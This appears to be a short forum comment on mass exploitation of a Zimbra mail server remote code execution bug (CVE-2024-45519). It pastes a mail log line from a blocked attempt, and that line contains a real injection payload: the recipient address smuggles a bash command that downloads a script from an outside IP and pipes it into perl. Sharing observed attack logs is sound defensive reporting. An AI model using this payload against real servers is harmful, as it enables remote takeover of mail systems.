Zimbra4Shell!
Who'd have thought the concept would become popular?
"Patch yesterday" is the advice from infosec researchers as the latest critical vulnerability affecting Zimbra mail servers is now being mass-exploited. The remote code execution vulnerability (CVE-2024-45519) was disclosed on September 27, along with a proof of concept (PoC) exploit, and Proofpoint reports that attacks using …
Seen in my logs:
NOQUEUE: reject: RCPT from RB61004.rapidns.com[43.240.65.221]: 554 5.7.1 Service unavailable; Client host [43.240.65.221] blocked using zen.spamhaus.org; Listed by CSS, see https://check.spamhaus.org/query/ip/43.240.65.221; from=<exploit@mail.domain.com> to=<"exploit$(bash -c 'wget -qO - http://108.179.211.43/foxx|perl')"@mail.domain.com> proto=ESMTP helo=<localhost>